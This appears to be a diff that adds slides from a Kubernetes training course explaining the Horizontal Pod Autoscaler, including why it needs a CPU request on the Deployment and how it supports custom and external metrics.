+  ```bash
+  kubectl autoscale deployment busyhttp --max=10
+  ```
+
+]
+
+By default, it will assume a target of 80% CPU usage.
+
+This can also be set with `--cpu-percent=`.
+
+--
+
+*The autoscaler doesn't seem to work. Why?*
+
+---
+
+## What did we miss?
+
+- The events stream gives us a hint, but to be honest, it's not very clear:
+
+  `missing request for cpu`
+
+- We forgot to specify a resource request for our Deployment!
+
+- The HPA target is not an absolute CPU%
+
+- It is relative to the CPU requested by the pod
+
+---
+
+## Adding a CPU request
+
+- Let's edit the deployment and add a CPU request
+
+- Since our server can use up to 1 core, let's request 1 core
+
+.exercise[
+
+- Edit the Deployment definition:
+  ```bash
+  kubectl edit deployment busyhttp
+  ```
+
+- In the `containers` list, add the following block:
+  ```yaml
+    resources:
+      requests:
+        cpu: "1"
+  ```
+
+]
+
+---
+
+## Results
+
+- After saving and quitting, a rolling update happens
+
+  (if `ab` or `httping` exits, make sure to restart it)
+
+- It will take a minute or two for the HPA to kick in:
+
+  - the HPA runs every 30 seconds by default
+
+  - it needs to gather metrics from the metrics server first
+
+- If we scale further up (or down), the HPA will react after a few minutes:
+
+  - it won't scale up if it already scaled in the last 3 minutes
+
+  - it won't scale down if it already scaled in the last 5 minutes
+
+---
+
+## What about other metrics?
+
+- The HPA in API group `autoscaling/v1` only supports CPU scaling
+
+- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
+
+  - metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
+
+  - custom.metrics.k8s.io, custom metrics per Pod
+
+  - external.metrics.k8s.io, external metrics (not associated with Pods)
+
+- Kubernetes doesn't implement any of these API groups
+
+- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
+
+- The metrics provided by metrics server are standard; everything else is custom
+
+- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
--- a/Show More
+++ b/Show More